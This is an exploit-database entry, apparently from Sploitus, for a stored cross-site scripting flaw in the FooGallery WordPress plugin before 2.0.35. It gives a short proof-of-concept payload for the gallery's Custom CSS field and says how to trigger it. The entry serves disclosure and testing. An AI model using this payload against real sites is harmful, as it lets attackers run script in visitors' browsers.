Sploitus

Exploit for FooGallery < 2.0.35 - Authenticated Stored Cross-Site Scripting

wpexploit · 2021-05-31

Exploit Code

MARKDOWN3 lines
## https://sploitus.com/exploit?id=WPEX-ID:950F46AE-4476-4969-863A-0E55752953B3
Create or edit a gallery and add the following payload in the Custom CSS field: </style><svg/onload=alert(document.domain)>
Then, view the embed gallery (which must have at least one image) in a page or post to trigger the XSS